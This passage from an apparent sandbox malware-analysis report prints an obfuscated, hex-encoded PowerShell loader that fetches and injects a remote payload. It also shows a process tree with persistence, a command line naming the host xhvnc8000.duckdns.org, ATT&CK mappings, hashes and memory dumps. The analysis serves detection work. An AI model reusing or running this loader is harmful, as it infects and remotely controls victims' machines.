'CAE5E8FAFAA5A9D9FCEBE5E0EAA5A9DAECE8E5ECEDA5A9C8E7FAE0CAE5E8FAFAA5A9C8FCFDE6CAE5E8FAFA';$evalu2=nattergal02 'C0E7FFE6E2EC';$evalu3=nattergal02 'D9FCEBE5E0EAA5A9C1E0EDECCBF0DAE0EEA5A9C7ECFEDAE5E6FDA5A9DFE0FBFDFCE8E5';$evalu4=nattergal02 'DFE0FBFDFCE8E5C8E5E5E6EA';$evalu5=nattergal02 'E7FDEDE5E5';$evalu6=nattergal02 'C7FDD9FBE6FDECEAFDDFE0FBFDFCE8E5C4ECE4E6FBF0';$evalu7=nattergal02 'C0CCD1';$evalu8=nattergal02 'D5';$Krummerne237=nattergal02 'DCDACCDBBABB';$Fraval=nattergal02 'CAE8E5E5DEE0E7EDE6FED9FBE6EAC8';function fkp {Param ($Tadpol, $Alvors) ;$tomhyphens0 =nattergal02 'ADDFE0E5E2E8E8FBE5A9B4A9A1D2C8F9F9CDE6E4E8E0E7D4B3B3CAFCFBFBECE7FDCDE6E4E8E0E7A7CEECFDC8FAFAECE4EBE5E0ECFAA1A0A9F5A9DEE1ECFBECA4C6EBE3ECEAFDA9F2A9ADD6A7CEE5E6EBE8E5C8FAFAECE4EBE5F0CAE8EAE1ECA9A4C8E7EDA9ADD6A7C5E6EAE8FDE0E6E7A7DAF9E5E0FDA1ADECFFE8E5FCB1A0D2A4B8D4A7CCF8FCE8E5FAA1ADCAE6E8EDE3B9A0A9F4A0A7CEECFDDDF0F9ECA1ADCAE6E8EDE3B8A0';&($evalu7) $tomhyphens0;$tomhyphens5 = nattergal02 'ADC5FBECEBE6EEFAFAA9B4A9ADDFE0E5E2E8E8FBE5A7CEECFDC4ECFDE1E6EDA1ADCAE6E8EDE3BBA5A9D2DDF0F9ECD2D4D4A9C9A1ADCAE6E8EDE3BAA5A9ADCAE6E8EDE3BDA0A0';&($evalu7) $tomhyphens5;$tomhyphens1 = nattergal02 'FBECFDFCFBE7A9ADC5FBECEBE6EEFAFAA7C0E7FFE6E2ECA1ADE7FCE5E5A5A9C9A1D2DAF0FAFDECE4A7DBFCE7FDE0E4ECA7C0E7FDECFBE6F9DAECFBFFE0EAECFAA7C1E8E7EDE5ECDBECEFD4A1C7ECFEA4C6EBE3ECEAFDA9DAF0FAFDECE4A7DBFCE7FDE0E4ECA7C0E7FDECFBE6F9DAECFBFFE0EAECFAA7C1E8E7EDE5ECDBECEFA1A1C7ECFEA4C6EBE3ECEAFDA9C0E7FDD9FDFBA0A5A9A1ADDFE0E5E2E8E8FBE5A7CEECFDC4ECFDE1E6EDA1ADCAE6E8EDE3BCA0A0A7C0E7FFE6E2ECA1ADE7FCE5E5A5A9C9A1ADDDE8EDF9E6E5A0A0A0A0A5A9ADC8E5FFE6FBFAA0A0';&($evalu7) $tomhyphens1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Levne,[Parameter(Position = 1)] [Type] $prezona = [Void]);$tomhyphens2 = nattergal02 'ADC3ECFCEFE6FBA9B4A9D2C8F9F9CDE6E4E8E0E7D4B3B3CAFCFBFBECE7FDCDE6E4E8E0E7A7CDECEFE0E7ECCDF0E7E8E4E0EAC8FAFAECE4EBE5F0A1A1C7ECFEA4C6EBE3ECEAFDA9DAF0FAFDECE4A7DBECEFE5ECEAFDE0E6E7A7C8FAFAECE4EBE5F0C7E8E4ECA1ADCAE6E8EDE3B1A0A0A5A9D2DAF0FAFDECE4A7DBECEFE5ECEAFDE0E6E7A7CCE4E0FDA7C8FAFAECE4EBE5F0CBFCE0E5EDECFBC8EAEAECFAFAD4B3B3DBFCE7A0A7CDECEFE0E7ECCDF0E7E8E4E0EAC4E6EDFCE5ECA1ADCAE6E8EDE3B0A5A9ADEFE8E5FAECA0A7CDECEFE0E7ECDDF0F9ECA1ADECFFE8E5FCB9A5A9ADECFFE8E5FCB8A5A9D2DAF0FAFDECE4A7C4FCE5FDE0EAE8FAFDCDECE5ECEEE8FDECD4A0';&($evalu7) $tomhyphens2;$tomhyphens3 = nattergal02 'ADC3ECFCEFE6FBA7CDECEFE0E7ECCAE6E7FAFDFBFCEAFDE6FBA1ADCAE6E8EDE3BFA5A9D2DAF0FAFDECE4A7DBECEFE5ECEAFDE0E6E7A7CAE8E5E5E0E7EECAE6E7FFECE7FDE0E6E7FAD4B3B3DAFDE8E7EDE8FBEDA5A9ADC5ECFFE7ECA0A7DAECFDC0E4F9E5ECE4ECE7FDE8FDE0E6E7CFE5E8EEFAA1ADCAE6E8EDE3BEA0';&($evalu7) $tomhyphens3;$tomhyphens4 = nattergal02 'ADC3ECFCEFE6FBA7CDECEFE0E7ECC4ECFDE1E6EDA1ADECFFE8E5FCBBA5A9ADECFFE8E5FCBAA5A9ADF9FBECF3E6E7E8A5A9ADC5ECFFE7ECA0A7DAECFDC0E4F9E5ECE4ECE7FDE8FDE0E6E7CFE5E8EEFAA1ADCAE6E8EDE3BEA0';&($evalu7) $tomhyphens4;$tomhyphens5 = nattergal02 'FBECFDFCFBE7A9ADC3ECFCEFE6FBA7CAFBECE8FDECDDF0F9ECA1A0';&($evalu7) $tomhyphens5 ;}$Sayable = nattergal02 'E2ECFBE7ECE5BABB';$tomhyphens6 = nattergal02 'ADCFE5E8EBECE5E5E0E7ECA9B4A9D2DAF0FAFDECE4A7DBFCE7FDE0E4ECA7C0E7FDECFBE6F9DAECFBFFE0EAECFAA7C4E8FBFAE1E8E5D4B3B3CEECFDCDECE5ECEEE8FDECCFE6FBCFFCE7EAFDE0E6E7D9E6E0E7FDECFBA1A1EFE2F9A9ADDAE8F0E8EBE5ECA9ADECFFE8E5FCBDA0A5A9A1CECDDDA9C9A1D2C0E7FDD9FDFBD4A5A9D2DCC0E7FDBABBD4A5A9D2DCC0E7FDBABBD4A5A9D2DCC0E7FDBABBD4A0A9A1D2C0E7FDD9FDFBD4A0A0A0';&($evalu7) $tomhyphens6;$Benthoscop = fkp $evalu5 $evalu6;$tomhyphens7 = nattergal02 'ADDAE2EEECBAA9B4A9ADCFE5E8EBECE5E5E0E7ECA7C0E7FFE6E2ECA1D2C0E7FDD9FDFBD4B3B3D3ECFBE6A5A9BFBCB0A5A9B9F1BAB9B9B9A5A9B9F1BDB9A0';&($evalu7) $tomhyphens7;$tomhyphens8 = nattergal02 'ADCBFBFCE7E0F3ECE4EAE1A9B4A9ADCFE5E8EBECE5E5E0E7ECA7C0E7FFE6E2ECA1D2C0E7FDD9FDFBD4B3B3D3ECFBE6A5A9BDBBBCB9B9B9B0BFA5A9B9F1BAB9B9B9A5A9B9F1BDA0';&($evalu7) $tomhyphens8;$nattergal01 = nattergal02 'E1FDFDF9FAB3A6A6EEE6FFFDE3E6EBEDE8F0A7E0E7A6E8EDE4E0E7A6EBFBE6E7EAE1E6FBFBE1A7EAE1E4';$nattergal00 = nattergal02 'ADC6FBEDE7A9B4A9A1C7ECFEA4C6EBE3ECEAFDA9C7ECFDA7DEECEBCAE5E0ECE7FDA0A7CDE6FEE7E5E6E8EDDAFDFBE0E7EEA1ADE7E8FDFDECFBEEE8E5B9B8A0';$tomhyphens8 = nattergal02 'ADDAE2EEECBBB4ADECE7FFB3E8F9F9EDE8FDE8';&($evalu7) $tomhyphens8;$Skge2=$Skge2+'\Maski.San';$Ordn='';if (-not(Test-Path $Skge2)) {while ($Ordn -eq '') {&($evalu7) $nattergal00;Start-Sleep 5;}Set-Content $Skge2 $Ordn;}$Ordn = Get-Content $Skge2;$tomhyphens9 = nattergal02 'ADFDE6E4E1F0F9E1ECE7FAA9B4A9D2DAF0FAFDECE4A7CAE6E7FFECFBFDD4B3B3CFFBE6E4CBE8FAECBFBDDAFDFBE0E7EEA1ADC6FBEDE7A0';&($evalu7) $tomhyphens9;$Ordn0 = nattergal02 'D2DAF0FAFDECE4A7DBFCE7FDE0E4ECA7C0E7FDECFBE6F9DAECFBFFE0EAECFAA7C4E8FBFAE1E8E5D4B3B3CAE6F9F0A1ADFDE6E4E1F0F9E1ECE7FAA5A9B9A5A9A9ADDAE2EEECBAA5A9BFBCB0A0';&($evalu7) $Ordn0;$Saadan=$tomhyphens.count-659;$Ordn1 = nattergal02 'D2DAF0FAFDECE4A7DBFCE7FDE0E4ECA7C0E7FDECFBE6F9DAECFBFFE0EAECFAA7C4E8FBFAE1E8E5D4B3B3CAE6F9F0A1ADFDE6E4E1F0F9E1ECE7FAA5A9BFBCB0A5A9ADCBFBFCE7E0F3ECE4EAE1A5A9ADDAE8E8EDE8E7A0';&($evalu7) $Ordn1;$Ordn2 = nattergal02 'ADCCF9E0FDE1ECE5A9B4A9D2DAF0FAFDECE4A7DBFCE7FDE0E4ECA7C0E7FDECFBE6F9DAECFBFFE0EAECFAA7C4E8FBFAE1E8E5D4B3B3CEECFDCDECE5ECEEE8FDECCFE6FBCFFCE7EAFDE0E6E7D9E6E0E7FDECFBA1A1EFE2F9A9ADC2FBFCE4E4ECFBE7ECBBBABEA9ADCFFBE8FFE8E5A0A5A9A1CECDDDA9C9A1D2C0E7FDD9FDFBD4A5A9D2C0E7FDD9FDFBD4A5A9D2C0E7FDD9FDFBD4A5A9D2C0E7FDD9FDFBD4A5A9D2C0E7FDD9FDFBD4A0A9A1D2C0E7FDD9FDFBD4A0A0A0';&($evalu7) $Ordn2;$Ordn3 = nattergal02 'ADCCF9E0FDE1ECE5A7C0E7FFE6E2ECA1ADDAE2EEECBAA5ADCBFBFCE7E0F3ECE4EAE1A5ADCBECE7FDE1E6FAEAE6F9A5B9A5B9A0';&($evalu7) $Ordn3#"
        3⤵
        • Blocklisted process makes network request
        • Checks QEMU agent file
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1840
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"
          4⤵
          • Checks QEMU agent file
          • Adds Run key to start application
          • Suspicious use of NtCreateThreadExHideFromDebugger
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3448
          • C:\Windows\explorer.exe
            "C:\Windows\explorer.exe"
            5⤵
            • Modifies Installed Components in the registry
            • Enumerates connected drives
            • Checks SCSI registry key(s)
            • Modifies registry class
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            PID:392
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" DI2Q7U xhvnc8000.duckdns.org 8000 7CGMXO
            5⤵
              PID:3980
    • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
      "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
      1⤵
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:4304
    • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
      "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
      1⤵
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:2332

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Persistence

    Registry Run Keys / Startup Folder

    2
    T1060

    Privilege Escalation

    Defense Evasion

    Modify Registry

    2
    T1112

    Credential Access

    Discovery

    Query Registry

    4
    T1012

    System Information Discovery

    5
    T1082

    Peripheral Device Discovery

    2
    T1120

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133240590696421318.txt
      Filesize

      75KB

      MD5

      65019a5db517d9fb830d8a57406a03ea

      SHA1

      817faf2ffe8461f653519e7bd96e7ee75021c891

      SHA256

      3ae88b3a99e6b785bdb44760790bc03ac722ef5b673ad5b3ca49b5cc5eecf84f

      SHA512

      bcc985d3fa48efcbb4a334b1a341a6686ef6c69f237d6d9bdcd9885696d148519ab824b9150194d783cb03189c1cc00a483f1b73ebce323f1f6a303a05b8ea62

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nauwv1b0.vhh.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit
    • memory/180-133-0x00000256E6200000-0x00000256E6222000-memory.dmp
      Filesize

      136KB

      Download
    • memory/180-143-0x00000256FFE60000-0x00000256FFE70000-memory.dmp
      Filesize

      64KB

      Download
    • memory/180-144-0x00000256FFE60000-0x00000256FFE70000-memory.dmp
      Filesize

      64KB

      Download
    • memory/180-145-0x00000256FFE60000-0x00000256FFE70000-memory.dmp
      Filesize

      64KB

      Download
    • memory/180-170-0x00000256FFE60000-0x00000256FFE70000-memory.dmp
      Filesize

      64KB

      Download
    • memory/180-169-0x00000256FFE60000-0x00000256FFE70000-memory.dmp
      Filesize

      64KB

      Download
    • memory/392-201-0x0000000002E00000-0x0000000002E01000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1840-151-0x0000000005640000-0x00000000056A6000-memory.dmp
      Filesize

      408KB

      Download
    • memory/1840-148-0x0000000004960000-0x0000000004970000-memory.dmp
      Filesize

      64KB

      Download
    • memory/1840-152-0x0000000005720000-0x0000000005786000-memory.dmp
      Filesize

      408KB

      Download
    • memory/1840-162-0x0000000005D50000-0x0000000005D6E000-memory.dmp
      Filesize

      120KB

      Download
    • memory/1840-163-0x0000000006F20000-0x0000000006FB6000-memory.dmp
      Filesize

      600KB

      Download
    • memory/1840-164-0x0000000006260000-0x000000000627A000-memory.dmp
      Filesize

      104KB

      Download
    • memory/1840-165-0x00000000062B0000-0x00000000062D2000-memory.dmp
      Filesize

      136KB

      Download
    • memory/1840-166-0x0000000007570000-0x0000000007B14000-memory.dmp
      Filesize

      5.6MB

      Download
    • memory/1840-167-0x0000000004960000-0x0000000004970000-memory.dmp
      Filesize

      64KB

      Download
    • memory/1840-168-0x00000000081A0000-0x000000000881A000-memory.dmp
      Filesize

      6.5MB

      Download
    • memory/1840-149-0x0000000004960000-0x0000000004970000-memory.dmp
      Filesize

      64KB

      Download
    • memory/1840-147-0x0000000004FA0000-0x00000000055C8000-memory.dmp
      Filesize

      6.2MB

      Download
    • memory/1840-173-0x0000000008820000-0x000000000B0A8000-memory.dmp
      Filesize

      40.5MB

      Download
    • memory/1840-175-0x0000000004960000-0x0000000004970000-memory.dmp
      Filesize

      64KB

      Download
    • memory/1840-174-0x0000000004960000-0x0000000004970000-memory.dmp
      Filesize

      64KB

      Download
    • memory/1840-176-0x00000000070D0000-0x00000000070D1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1840-177-0x0000000004960000-0x0000000004970000-memory.dmp
      Filesize

      64KB

      Download
    • memory/1840-150-0x0000000004EB0000-0x0000000004ED2000-memory.dmp
      Filesize

      136KB

      Download
    • memory/1840-146-0x0000000002430000-0x0000000002466000-memory.dmp
      Filesize

      216KB

      Download
    • memory/2332-351-0x0000029085400000-0x0000029086D2F000-memory.dmp
      Filesize

      25.2MB

      Download
    • memory/2332-212-0x00000290879A0000-0x00000290879C0000-memory.dmp
      Filesize

      128KB

      Download
    • memory/2332-210-0x0000029087590000-0x00000290875B0000-memory.dmp
      Filesize

      128KB

      Download
    • memory/2332-208-0x00000290875D0000-0x00000290875F0000-memory.dmp
      Filesize

      128KB

      Download
    • memory/3448-179-0x0000000000DC0000-0x0000000003648000-memory.dmp
      Filesize

      40.5MB

      Download
    • memory/3448-192-0x0000000022370000-0x0000000022380000-memory.dmp
      Filesize

      64KB

      Download
    • memory/3448-194-0x0000000000DC0000-0x0000000003648000-memory.dmp
      Filesize

      40.5MB

      Download
    • memory/3448-190-0x0000000022060000-0x00000000220F2000-memory.dmp
      Filesize

      584KB

      Download
    • memory/3448-189-0x0000000021F20000-0x0000000021FBC000-memory.dmp
      Filesize

      624KB

      Download
    • memory/3448-188-0x0000000000400000-0x0000000000416000-memory.dmp
      Filesize

      88KB

      Download
    • memory/3448-187-0x0000000000DC0000-0x0000000003648000-memory.dmp
      Filesize

      40.5MB

      Download
    • memory/3448-186-0x0000000000400000-0x000000000062B000-memory.dmp
      Filesize

      2.2MB

      Download
    • memory/3980-198-0x0000000004CC0000-0x0000000004CD0000-memory.dmp
      Filesize

      64KB

      Download
    • memory/3980-191-0x0000000000400000-0x0000000000416000-memory.dmp
      Filesize

      88KB

      Download
    • memory/3980-350-0x0000000004CC0000-0x0000000004CD0000-memory.dmp
      Filesize

      64KB

      Download